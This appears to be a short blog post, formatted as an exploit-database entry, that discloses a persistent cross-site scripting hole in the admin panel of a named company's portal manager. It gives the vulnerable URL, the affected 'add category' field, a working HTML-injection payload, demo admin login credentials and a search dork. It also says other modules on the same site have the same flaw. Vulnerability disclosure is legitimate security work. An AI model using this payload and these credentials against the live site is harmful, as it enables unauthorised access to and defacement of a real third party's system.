Hopestudio.in persistent XSS vulnerability

%+         $…….#……..4………|)…….0…………\/\/       %+

                                              %+                                                                                                         %+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title: Hopestudio.in persistent XSS vulnerability
# Vendor: www.hopestudio.in/demo.php
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# My Blog: http://www.shadowrootkit.wordpress.com
# Google Dork:  © 2009 Hope Solutions

****************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : www.hopestudio.in/portalmanager/admin/

EXPLOIT:  “>><marquee><h1>XSSed_by_r007k17</h1></marquee>

Observe: A persistent cross-site scripting vulnerability in add category in Admin panel(logged in as : uname: portal password:hope)

******************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14–
*******************************************************************************************************

similar thing in contentmanager, institute manager in the same site(in demo admin login panel)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: